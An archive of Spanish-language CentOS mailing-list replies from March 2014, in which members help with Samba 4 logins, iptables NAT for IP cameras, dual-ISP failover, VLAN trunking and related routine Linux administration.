Re: [CentOS-es] Login Grafico Samba 4 Active Directory + Domain Controller
El 19/03/2014 5:33, Fermin Francisco escribió: Buenas noches!! Algunos de ustedes ha probado lo siguiente: Tengo una maquina con Centos 6.4, e instale Samba 4 como Directorio Activo + Controlador de dominio. Lo que quiero es poder loguearme ademas de la forma tradicional con los usuarios locales de mi Centos (root, fermin, etc), tambien me gustaria poder lograr loguearme con cualquier usuario que haya creado en el directorio activo. Por ejemplo si yo creo un usuario llamado jose en el directorio activo (samba 4) quisiera que con ese usuario me pudiera loguear cuando me presente la ventana de login grafico en Centos, ademas de poder seguir utilizando mis usuarios locales (root, fermin, etc). Alguien ha hecho esto?? Yo lo he hecho SSSD pero el AD estaba en un Windows Server. Supongo que no debe haber mucha diferencia desde el punto de vista del cliente. Prueba instalando SSSD en los clientes: https://wiki.samba.org/index.php/Local_user_management_and_authentication/sssd Hay cientos de tutoriales en Internet. Busca SSSD + CentOS o SAMBA 4. Recuerda que después debes configurar PAM para que primero se autentifique en local y luego contra el SAMBA 4. Recuerdo que en Red Hat existe una aplicación gráfica para configurar SSSD. Está en System Administration Authentication. Ahora no tengo un CentOS aquí para comprobar si también está pero es probable. Si la encuentras te ahorrarás editar unos cuantos ficheros desde el terminal. Gracias!! Suerte! -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Nateo + upnp
Hola, El 18/03/2014 15:43, César Martinez escribió: Hola Ramón gracias por responder, el nat que hago esta funcionando bien porque tengo otros nateos con el mismo esquema y funcionan bien, lo que sospecho es que mi firewall esta bloqueando algo más que necesitan estas cámaras pero no logro detectar que es, por eso queria ver si existe alguna forma como el tail -f ver en el momento que me trato de conectar que bloquea mi firewall, cabe recalcar que localmente en mi red red se ven perfecto las cámaras con la ip:puerto, pero local Para ver los paquetes descartados por el firewall. En CentOS creo que por defecto es /var/log/messages: grep -i drop /var/log/messages También puedes filtrar por origen o puerto y ver que pasa: grep direccion_origen /var/log/messages También puedes crear una regla iptables para que logee ciertos paquetes: iptables -I INPUT -j LOG --log-prefix Denied: --log-level 7 Añade puertos y/o direcciones IP entre INPUT y -j LOG para afinar. Luego busca con grep en /var/log/messages la cadena Denied: Finalmente y como ya te han sugerido puedes ver en tiempo real que pasa con tcpdump. Como se trata de un gateway habrá bastante tráfico. Puedes filtrar lo que tcpdump te muestra con comandos como: tcpdump -i ethX host A.B.C.D and port tcpdump -i ethX host A.B.C.D and port \( or \) Prueba también cambiando host por dst o src o si quieres buscar un rango de puertos cambiando port por portrange -1200. Gracias Saludos Yo us el siguiente esquema: *IPT=iptables* *#IP Publica del Servidor (eth0: interfaz de la ip publica) * *IP1=$(ifconfig eth0|grep inet |sed -e s/addr://|awk '{print $2}')#IP Servidor Local IP2=192.168.30.1#IP de red interna IP3=192.168.30.28PUERTOINT=928PUERTOLAN=80$IPT -t filter -I FORWARD -p tcp --dport ${PUERTOLAN} -j ACCEPT$IPT -I FORWARD -m tcp -p tcp -s $IP3 --sport ${PUERTOLAN} -j ACCEPT $IPT -I INPUT -p tcp -d $IP1 --dport ${PUERTOINT} -j ACCEPT$IPT -t nat -I PREROUTING -p tcp -d $IP1 --dport ${PUERTOINT} -j DNAT --to $IP3:${PUERTOLAN}$IPT -t nat -I POSTROUTING -p tcp -d $IP3 --dport ${PUERTOLAN} -j SNAT --to-source $IP2 * En el ejemplo que te paso para ver remotamente la cámara debes pner en tu explorador: http://IPPUBLICA:928, lo cual te hace el direccionamiento a la ip 192.168.30.28, Espero te sirva. Saludos -- Ramón Macías Zamora Tecnología, Investigación y Desarrollo www.rks.ec - www.raykasolutions.com Guayaquil - Ecuador msn:ramon_mac...@hotmail.com skype: ramon_macias UserLinux# 180926 (http://counter.li.org) Cel:593-8-0192238 Tel:593 4 6044566 http://www.raykasolutions.com/ WEB SITES, HOSTINGS, DOMINIOS, MANTENIMIENTO DE EQUIPOS, REDES, SERVIDORES LINUX, SOPORTE. 2014-03-18 9:22 GMT-05:00 César Martinez cmarti...@servicomecuador.com: Saludos a todos, sigo aún sin poder usar el nat en las cámaras, de pronto hay alguna forma de poder ver que puerto esta tratando de acceder cuando digito la_ip:elpuerto de esta forma vería en mi firewall que es lo que esta cerrando Gracias Un saludo a todos los listeros aquí molestando con otro problema que tengo, en una empresa tienen unas cámaras ip marca Dlink las mismas que funcionan localmente bien, en mi servidor linux he realizado el nateo de la ip y los puertos que funcionan local para verlas desde fuera de la oficina, contacte a la gente de Dlink y me dicen que posiblemente sea porque estas cámaras necesitan el protocolo upnp para que funcionen desde fuera, he investigado en google y no logro encontrar nada al respecto como poder natear o abrir este protocolo, agradezco a todos los que puedan ayudarme con mi problema aqui el resumen Ip de 1 cámara 192.168.0.8 puerto de esta cámara: #camaras $IPTABLES -A INPUT -p tcp --dport -j ACCEPT $IPTABLES -A INPUT -p udp --dport -j ACCEPT Aquí abres el puerto para TCP y UDP y luego solo haces el DNAT y el FORWARD para el TCP. Te falta el UDP si es que realmente es necesario. ##Nat Cámaras $IPTABLES -A PREROUTING -t nat -i $EXTERNALIF -p tcp -d $EXTERNALIP --dport \ -j DNAT --to 192.168.0.8: $IPTABLES -A FORWARD -i $EXTERNALIF -p tcp -d 192.168.0.8 --dport -j ACCEPT Esta regla nunca hará match porqué en la $EXTERNALIF el destino del paquete nunca será -d 192.168.0.8. Prueba cambiando 192.168.0.8 por $EXTERNALIP Saludos Saludos. César ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart
Re: [CentOS-es] Alta disponibilidad 2 ISP
Hola César, El 16/03/2014 13:54, César Martinez escribió: Un saludo a todos los listeros, tengo un servidor centos 6.5 con dos tarjetas de red eth0 y eth1, presta servicio proxy + dhcp + firewall, por temas de alta disponibilidad se va a contratar otro proveedor de internet, para que el servicio en teoría nunca se caiga, si no hay internet por el 1 proveedor la idea es que todo sea automático y entre a funcionar el otro. Buscando en al red incluso en esta lista se ha mencionado este problema pero no se si alguien logro hacerlo, en la red mencionan sobre como hacerlo con varias distribuciones, incluso encontré una explicación muy bien detalla por parte de EPE en su portal web usando zeroshell, pero la idea es implementar esto directamente en mi servidor con Centos sin tener que cambiar de distribución, de pronto alguien lo tiene funcionando y pueda ayudarme con esto. Se puede con iproute2: http://www.lartc.org/howto/lartc.rpdb.multiple-links.html También puedes marcar paquetes para que salgan siempre por el mismo proveedor de Internet: http://www.lartc.org/howto/lartc.netfilter.html No es complicado pero te recomiendo leer el capítulo 3 y 4 del mismo howto (http://www.lartc.org/howto/)para comprender un poco mejor lo que estás haciendo. Aquí también está muy bien explicado: http://linux-ip.net/html/adv-multi-internet.html De este howto te recomiendo la lectura de los capítulos 4 y 10 y los apéndices D2 y D3: http://linux-ip.net/html Posteriormente con Squid (si es que usas este proxy) puedes afinar mucho los anchos de banda que ofreces con: delay_pools delay_class delay_parameters delay_access También con Squid puedes forzar que ciertos usuarios salgan siempre por una de las ADSL con: tcp_outgoing_address iface_externa_proxy acl_grupo_usuarios Gracias a todos De nada. César -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Alta disponibilidad 2 ISP
Hola, El 17/03/2014 0:44, SisNet escribió: Te cuento que yo también estuve probando algunas alternativas como zeroshell clearos y algún script que encontré por algún lado ... A la final para balanceo de carga con tolerancia a fallos mejor use un dfl-860 ! Es verdad que el balanceo de carga con iproute2 no es gran cosa. No es muy configurable. Además el balanceo basado en rutas tiene un problema importante: las páginas más visitadas casi siempre usarán la misma ADSL para salir ya que la ruta es solicitada muy a menudo. Eso dificulta que la ruta expire y sea borrada de la cache e introducida de nuevo pero con el otro proveedor. El problema es que el verdadero load balancing con QoS es complicado de implementar. Lo que a priori es una ventaja, su alta personalización, es también un problema. Yo personalmente, y si se le puede llamar balanceo de carga, lo hago con Squid (con las opciones que antes he comentado) forzando a los usuarios que más ancho de banda consumen salir por la ADSL más rápida y al mismo tiempo limitando el ancho de banda por usuario y por grupo de usuarios. Saludos, Fabricio Palacios V. Enviado desde mi iPhone 5 El 16/03/2014, a las 17:06, César Martinez cmarti...@servicomecuador.com escribió: Gracias Carlos estaba analizando y en realidad me parece que la única solución que menciona David es viable bajo centos, pienso crear unos scripts con cp para que sobreescriba, se me ocurre que la única forma de hacer lo automático es de alguna forma se pueda detectar perdida de paquetes por la interfaz del 1 proveedor o 2, de esa forma copia el archivo y hace un restart a las reglas me parece que seria la única forma de medio automatizar la cosa, de pronto alguien sabe de que forma se puede detectar perdida de paquetes a parte de hacer un ping constante. Saludos César No dije que no se pueda, dije que yo no encontré una solución sobre CentOS. De cualquier forma siempre hay que ver todas las posibilidades que otras experiencias den. Saludos, David El día 16 de marzo de 2014, 10:15, César Martinez cmarti...@servicomecuador.com escribió: Gracias David es decir que no se puede hacer que los dos ISP den internet a la vez algo como balanceo y si se va uno el otro siempre estará funcionando? César On 16/03/14 08:11, David González Romero wrote: Lamentablemente yo estuve buscando lo mismo que tui hace algún tiempo. Unica solución que pude encontrar de forma automática era pfSense. De lo contrario siempre requeriras intervención de algun tipo. Yo implemente una opción de intervención. Basicamente: 1- Cree configuraciones de red para ambos ISP, incluido DNS 2- Implemente un par de script que cambian estas configuraciones con cp y reinician el servicio 3- Con webmin les di accesos a los usuarios no especializados que haran correr los scripr. Saludos, David El día 16 de marzo de 2014, 10:05, César Martinez cmarti...@servicomecuador.com escribió: Gracias Epe lo revisaré haber que encuentro, de todos modos si alguien más puede ayudarme les agradecería mucho César sobre como hacerlo con varias distribuciones, incluso encontré una explicación muy bien detalla por parte de EPE en su portal web usando zeroshell, pero la idea es implementar esto directamente en mi gracias por lo de portal ;-) podrías ver un documento llamado LARTC en el sitio lartc.org donde te darán todos los detalles.. es una variante, que no la única! ojalá exista ya un step by step, pero no le he buscado realmente. Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Saludos
El 17/03/2014 13:17, Dayron Fabars Maura escribió: Tengo un problema de que a 3 usuarios de mi red le llegan mensajes repetidos debido a que el remitente tiene error en una direccion de correo y al parecer el server mta lo ha puesto en cola de reitentos, por favor alguna ayuda para resolver esa situacion. Con los datos que das es poco menos que aventurado dar un diagnostico pero diría que tu explicación al problema no es correcta. ¿El remitente es una cuenta mail de tu dominio? ¿Los mail repetidos llegan con la misma fecha y hora de envío? No conozco sendmail pero intenta buscar en /var/log/mail.log (o log equivalente) la cuenta mail que envía los correos repetidos y envía un mail a la lista con el resultado: grep remite...@dominio.com /var/log/mail.log Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] [Off-Topic] Driver WiFi Realtek me cicla la Laptop !
El 17/03/2014 16:11, angel jauregui escribió: Buen día. Lo he marcado como *Off-Topic* porque no es enfocado a CentOS, asi que se agradece enormemente al que me brinde su apoyo :D. Tengo Ubuntu en mi laptop y hace una semana mas o menos salio en los repos la actualización para el Kernel, la aplique en su momento y me lleve la sorpresa que al parecer el *driver* para mi Wifi Realtek 8188CE viene da~ado en los módulos o nose si sea algún otro modulo el que este da~ado, el detalle es que simplemente al cargarse el modulo *rtl8192ce* y este a su vez carga varios módulos mas, me cicla el equipo. El ciclado no es solo que se congele la pantalla, sino que me saca las las Xs (ambiente ventanas) y me muestra los errores (tipo Kernel Panic!) en pantalla. Y ya no puedo desplazarme ni hacer nada, simplemente queda apagar el equipo dejando pulsado el boton de Power !. Verificando el log de syslog led dejo el buffer del error: http://pastebin.com/WziFpidD *De momento* tuve que entrara a ubuntu con Jaula (chroot usando GNU/Linux Buteable), editar el *modules.d/blacklist.conf* y poner todos los módulos rtl*, para que pudiera encender mi equipo y trabajar en el, porque de lo contrario mientras encendía y se intentaba cargar el modulo de la wifi se ciclaba inmediatamente ! Ahorita tengo en blacklist los módulos rtl* para que pueda encender y estoy trabajando con la LAN :'( *Alguna recomendacion, opinion o en que foro poner este mensaje/bug ?* Para reportar bugs en Ubuntu: https://help.ubuntu.com/community/ReportingBugs No tengo ni idea de como solucionar tu problema pero en vez de blacklistar todos los módules rtl, ¿has intentado arrancar con el kernel antiguo? Si funcionara tendrías el ordenador operativo con WiFi otra vez. Saludos ! -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Acceso directo
El 12/03/2014 2:25, Fermin Francisco escribió: Buenas noches!! Tengo instalado via wine un software que fue creado para entornos M$ Windows y quisiera saber saber la forma de como puedo crear un acceso remoto en el escritorio para todos los usuarios de la maquina Centos 6.4 que utilizo. Osea que si pedro, maria, juan, etc., etc, etc., se loguean en la maquina con Centos 6.4 el acceso directo del software le aparezca en el Escritorio (entorno grafico). Alguien ha hecho algo asi?? Para que se cree el acceso directo automáticamente en los usuarios que puedas añadir al sistema usa el directorio /etc/skel Para usuarios que ya existen en el sistema crea el acceso directo en tu usuario y asegúrate que funciona. Después lo copias a todos los perfiles de usuario del sistema con un script BASH tipo : #!/bin/bash for i in (ls -1 /home); do [[ -d /home/$i ]] cp /home/tu_usuario/acessodirecto /home/$i/Escritorio/acessodirecto chmod +x /home/$i/Escritorio/acessodirecto done Disculpen mi ignorancia!! JOSE FERMIN ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Rutas
El 11/03/2014 0:20, César Martinez escribió: Hola Francesc perdón por la demora la regla funcionó a la perfección muchas gracias por todo Recuerda que, INPUT es para paquetes con destino el firewall. OUTPUT es para paquetes originados en el propio firewall. FORWARD es para paquetes que pasan a traves del firewall. Es decir que no tienen como destino final ni origen el propio firewall si no que pasan a través de él, como era tu caso. Saludos César Saludos, El 07/03/2014 11:24, Francesc Guitart escribió: Hola César, Prueba añadiendo esta regla: $IPTABLES -I FORWARD -d 172.25.144.0/24 -i eth1 -j ACCEPT Por cierto, en cuanto a las reglas que me mandaste en el otro mail: $IPTABLES -A INPUT -s 192.168.0.0/24 -j ACCEPT $IPTABLES -A OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A OUTPUT -p tcp -d 172.25.144.0/24 -j ACCEPT $IPTABLES -I OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A POSTROUTING -t nat -o $EXTERNALIF -j MASQUERADE La primera y la cuarta son exactamente iguales. Elimina una de las dos. La tercera esta incluida dentro de la segunda (o la cuarta, como prefieras). Bórrala también. Olvidé una cosa. La quita regla parece que funciona bien, pero para ser exactos sería más bien: $IPTABLES -t nat -A POSTROUTING -o $EXTERNALIF -j MASQUERADE El 07/03/2014 11:04, César Martinez escribió: Hola Gracias por responder, paso por le proxy porque el cable del tunel de datos esta conectado ahora directo al switch que esta en el segmento 192.168.0.X, el isp creo unas rutas para enviar todo el trafico de datos a la ip 192.168.0.1 que es la ip de mi proxy actualmente. Como te menciono si bajo el firewall momentaneamente puedo hacer ping o entrar a un recurso compartido de la red 172.25.144.4 que es actualmente donde debo llegar, esta ip es un servidor windows que tiene una carpeta compartida. Te adjunto la salida de los comandos, muchas gracias por tu ayuda ip route 181.113.66.72/29 dev eth0 proto kernel scope link src 181.113.66.78 192.168.0.0/24 dev eth1 proto kernel scope link src 192.168.0.1 172.25.144.0/24 via 192.168.0.3 dev eth1 169.254.0.0/16 dev eth1 scope link default via 181.113.66.73 dev eth ip route show table local broadcast 181.113.66.79 dev eth0 proto kernel scope link src 181.113.66.78 broadcast 192.168.0.255 dev eth1 proto kernel scope link src 192.168.0.1 local 181.113.66.78 dev eth0 proto kernel scope host src 181.113.66.78 broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1 broadcast 181.113.66.72 dev eth0 proto kernel scope link src 181.113.66.78 local 192.168.0.1 dev eth1 proto kernel scope host src 192.168.0.1 broadcast 192.168.0.0 dev eth1 proto kernel scope link src 192.168.0.1 broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1 local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1 local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1 ifconfig -a eth0 Link encap:Ethernet HWaddr 00:26:5A:84:C3:B0 inet addr:181.113.66.78 Bcast:181.113.66.79 Mask:255.255.255.248 inet6 addr: fe80::226:5aff:fe84:c3b0/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:322452 errors:0 dropped:0 overruns:0 frame:0 TX packets:315335 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:218551617 (208.4 MiB) TX bytes:50814320 (48.4 MiB) Interrupt:169 Base address:0xc000 eth1 Link encap:Ethernet HWaddr 3C:4A:92:B2:92:E4 inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0 inet6 addr: fe80::3e4a:92ff:feb2:92e4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:401472 errors:0 dropped:0 overruns:0 frame:0 TX packets:326596 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:60175972 (57.3 MiB) TX bytes:235191189 (224.2 MiB) Interrupt:177 Memory:fbdf-fbe0 eth2 Link encap:Ethernet HWaddr 54:E6:FC:80:4C:C5 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:90 Base address:0xa000 loLink encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:485 errors:0 dropped:0 overruns:0 frame:0 TX packets:485 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:59577 (58.1 KiB) TX
Re: [CentOS-es] Ayuda Rutas
El 07/03/2014 11:32, Francesc Guitart escribió: El 07/03/2014 11:24, Francesc Guitart escribió: Hola César, Prueba añadiendo esta regla: $IPTABLES -I FORWARD -d 172.25.144.0/24 -i eth1 -j ACCEPT Por cierto, en cuanto a las reglas que me mandaste en el otro mail: $IPTABLES -A INPUT -s 192.168.0.0/24 -j ACCEPT $IPTABLES -A OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A OUTPUT -p tcp -d 172.25.144.0/24 -j ACCEPT $IPTABLES -I OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A POSTROUTING -t nat -o $EXTERNALIF -j MASQUERADE La primera y la cuarta son exactamente iguales. Elimina una de las dos. ^^^ Perdón, quería decir la segunda. La segunda y la cuarta son iguales. La tercera esta incluida dentro de la segunda (o la cuarta, como prefieras). Bórrala también. Olvidé una cosa. La quita regla parece que funciona bien, pero para ser exactos sería más bien: $IPTABLES -t nat -A POSTROUTING -o $EXTERNALIF -j MASQUERADE He estado leyendo un poco estos días a raíz de tu consulta y esta afirmación que hice no es cierta. Está perfectamente aceptado poner la cadena antes de la tabla como tu hiciste. Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Nateo + upnp
Hola César, El 11/03/2014 0:28, César Martinez escribió: Un saludo a todos los listeros aquí molestando con otro problema que tengo, en una empresa tienen unas cámaras ip marca Dlink las mismas que funcionan localmente bien, en mi servidor linux he realizado el nateo de la ip y los puertos que funcionan local para verlas desde fuera de la oficina, contacte a la gente de Dlink y me dicen que posiblemente sea porque estas cámaras necesitan el protocolo upnp para que funcionen desde fuera, he investigado en google y no logro encontrar nada al respecto como poder natear o abrir este protocolo, agradezco a todos los que puedan ayudarme con mi problema aqui el resumen Ip de 1 cámara 192.168.0.8 puerto de esta cámara: #camaras $IPTABLES -A INPUT -p tcp --dport -j ACCEPT $IPTABLES -A INPUT -p udp --dport -j ACCEPT Aquí abres el puerto para TCP y UDP y luego solo haces el DNAT y el FORWARD para el TCP. Te falta el UDP si es que realmente es necesario. ##Nat Cámaras $IPTABLES -A PREROUTING -t nat -i $EXTERNALIF -p tcp -d $EXTERNALIP --dport \ -j DNAT --to 192.168.0.8: $IPTABLES -A FORWARD -i $EXTERNALIF -p tcp -d 192.168.0.8 --dport -j ACCEPT Esta regla nunca hará match porqué en la $EXTERNALIF el destino del paquete nunca será -d 192.168.0.8. Prueba cambiando 192.168.0.8 por $EXTERNALIP Saludos Saludos. César -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Rutas
El 11/03/2014 13:38, César Martinez escribió: Hola Francesc es decir que esta regla esta bien $IPTABLES -A POSTROUTING -t nat -o $EXTERNALIF -j MASQUERADE Exactamente, las dos son válidas. El 07/03/2014 11:32, Francesc Guitart escribió: El 07/03/2014 11:24, Francesc Guitart escribió: Hola César, Prueba añadiendo esta regla: $IPTABLES -I FORWARD -d 172.25.144.0/24 -i eth1 -j ACCEPT Por cierto, en cuanto a las reglas que me mandaste en el otro mail: $IPTABLES -A INPUT -s 192.168.0.0/24 -j ACCEPT $IPTABLES -A OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A OUTPUT -p tcp -d 172.25.144.0/24 -j ACCEPT $IPTABLES -I OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A POSTROUTING -t nat -o $EXTERNALIF -j MASQUERADE La primera y la cuarta son exactamente iguales. Elimina una de las dos. ^^^ Perdón, quería decir la segunda. La segunda y la cuarta son iguales. La tercera esta incluida dentro de la segunda (o la cuarta, como prefieras). Bórrala también. Olvidé una cosa. La quita regla parece que funciona bien, pero para ser exactos sería más bien: $IPTABLES -t nat -A POSTROUTING -o $EXTERNALIF -j MASQUERADE He estado leyendo un poco estos días a raíz de tu consulta y esta afirmación que hice no es cierta. Está perfectamente aceptado poner la cadena antes de la tabla como tu hiciste. Saludos. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda con Multiples Vlan en una interfaz (TRUNK)
El 11/03/2014 14:27, Pablo Alberto Flores escribió: Estimados. Tengo un centos 6.5 y deseo pasar 3 vlan en una sola interfaz. el SW ya esta configurado como trunk pero no me levanta. si reviso el SW me muestra que hay 3 ip de vlan distintas conectadas. #sh mac address-table | i 0/21 10080.c8e1.0e04DYNAMIC Fa0/21 20080.c8e1.0e04DYNAMIC Fa0/21 40080.c8e1.0e04DYNAMIC Fa0/21 #sh ip arp 0080.c8e1.0e04 Protocol Address Age (min) Hardware Addr Type Interface Internet 172.16.115.243 0 0080.c8e1.0e04 ARPA Vlan2 Internet 172.16.114.21 0080.c8e1.0e04 ARPA Vlan1 Internet 172.16.112.21 0080.c8e1.0e04 ARPA Vlan4 mi tabla de rutas es la siguente #netstat -rn Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 172.16.112.00.0.0.0 255.255.255.0 U 0 0 0 eth0.4 172.16.115.00.0.0.0 255.255.255.0 U 0 0 0 eth0.2 172.16.114.00.0.0.0 255.255.255.0 U 0 0 0 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.2 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.4 0.0.0.0 172.16.115.10.0.0.0 UG0 0 0 eth0.2 pero no se conecta al mundo. ni siquiera la vlan que tiene el gw por defecto Has añadido la linea VLAN=yes en? /etc/sysconfig/network-scripts/ifcfg-eth0.1 /etc/sysconfig/network-scripts/ifcfg-eth0.2 /etc/sysconfig/network-scripts/ifcfg-eth0.4 -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda con Multiples Vlan en una interfaz (TRUNK)
El 11/03/2014 16:36, Pablo Alberto Flores escribió: Sip ¿Tienes el modulo 8021q cargado? lsmod | grep 8021q *Esta el la conf de mi eth0 cat ifcfg-eth0 DEVICE=eth0 HWADDR=00:80:C8:E1:0E:04 NM_CONTROLLED=no ONBOOT=yes BOOTPROTO=none TYPE=Ethernet y la de mi eth0.1 es cat ifcfg-eth0.1 DEVICE=eth0.1 HWADDR=00:80:C8:E1:0E:04 BOOTPROTO=none ONBOOT=yes IPADDR=172.16.114.2 NETMASK=255.255.255.0 GATEWAY=172.16.114.1 USERCTL=no NETWORK=172.16.114.0 VLAN=yes el ifconfig me da lo siguiente (...) Pero ninguna de las IP me reponde a los ping. agregue esta regla al firewall y la VLAN 2 responde iptables -A FORWARD -i eth0 -j ACCEPT Pues entonces será un problema con el firewall, ¿no? ¿Funciona si paras el iptables? Si la respuesta es sí añade las reglas pertinentes para eth0.1, eth0.2 y eth0.4 iptables -I INPUT -i eth0.1 -p icmp -j ACCEPT iptables -I INPUT -i eth0.2 -p icmp -j ACCEPT iptables -I INPUT -i eth0.4 -p icmp -j ACCEPT iptables -I OUTPUT -o eth0.1 -p icmp -j ACCEPT iptables -I OUTPUT -o eth0.2 -p icmp -j ACCEPT iptables -I OUTPUT -o eth0.4 -p icmp -j ACCEPT ¿Que IPs tienen las máquinas desde donde haces los pings? El 11 de marzo de 2014, 11:12, Francesc Guitart fguit...@gmx.com escribió: El 11/03/2014 14:27, Pablo Alberto Flores escribió: Estimados. Tengo un centos 6.5 y deseo pasar 3 vlan en una sola interfaz. el SW ya esta configurado como trunk pero no me levanta. si reviso el SW me muestra que hay 3 ip de vlan distintas conectadas. #sh mac address-table | i 0/21 10080.c8e1.0e04DYNAMIC Fa0/21 20080.c8e1.0e04DYNAMIC Fa0/21 40080.c8e1.0e04DYNAMIC Fa0/21 #sh ip arp 0080.c8e1.0e04 Protocol Address Age (min) Hardware Addr Type Interface Internet 172.16.115.243 0 0080.c8e1.0e04 ARPA Vlan2 Internet 172.16.114.21 0080.c8e1.0e04 ARPA Vlan1 Internet 172.16.112.21 0080.c8e1.0e04 ARPA Vlan4 mi tabla de rutas es la siguente #netstat -rn Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 172.16.112.00.0.0.0 255.255.255.0 U 0 0 0 eth0.4 172.16.115.00.0.0.0 255.255.255.0 U 0 0 0 eth0.2 172.16.114.00.0.0.0 255.255.255.0 U 0 0 0 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.2 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.4 0.0.0.0 172.16.115.10.0.0.0 UG0 0 0 eth0.2 pero no se conecta al mundo. ni siquiera la vlan que tiene el gw por defecto Has añadido la linea VLAN=yes en? /etc/sysconfig/network-scripts/ifcfg-eth0.1 /etc/sysconfig/network-scripts/ifcfg-eth0.2 /etc/sysconfig/network-scripts/ifcfg-eth0.4 -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda con Multiples Vlan en una interfaz (TRUNK)
El 11/03/2014 17:25, Pablo Alberto Flores escribió: si paro el iptables no funciona. el modulo 8021q esta cargado y parte automatico. agregue la linea reinicie la maquina y responden las 3 ip. :D iptables -A FORWARD -i eth0 -j ACCEPT ahora por curiosidad revise mi tabla de rutas # route -n Kernel IP routing table Destination Gateway Genmask Flags Metric RefUse Iface 172.16.112.00.0.0.0 255.255.255.0 U 0 00 eth0.4 172.16.115.00.0.0.0 255.255.255.0 U 0 00 eth0.2 172.16.114.00.0.0.0 255.255.255.0 U 0 00 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 1003 00 eth0 169.254.0.0 0.0.0.0 255.255.0.0 U 1004 00 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 1005 00 eth0.2 169.254.0.0 0.0.0.0 255.255.0.0 U 1006 00 eth0.4 0.0.0.0 172.16.115.10.0.0.0 UG0 00 eth0.2 no estan las puertas de enlace de la vlan 1 y 4, pero reponde a los ping. supongo que todos se estan ruteando por la puerta de enlace de la vlan 2 Eso depende de desde donde estás realizando los pings. Por ejemplo si haces los pings desde la red 172.16.112.0 o la red 172.16.114.0 la gateway por defecto no interviene para nada. Además gateway por defecto sólo puedes (o almenos deberías) tener una. Ahora me queda respaldar el procedimiento para el futuro El 11 de marzo de 2014, 11:50, Francesc Guitart fguit...@gmx.com escribió: El 11/03/2014 16:36, Pablo Alberto Flores escribió: Sip ¿Tienes el modulo 8021q cargado? lsmod | grep 8021q *Esta el la conf de mi eth0 cat ifcfg-eth0 DEVICE=eth0 HWADDR=00:80:C8:E1:0E:04 NM_CONTROLLED=no ONBOOT=yes BOOTPROTO=none 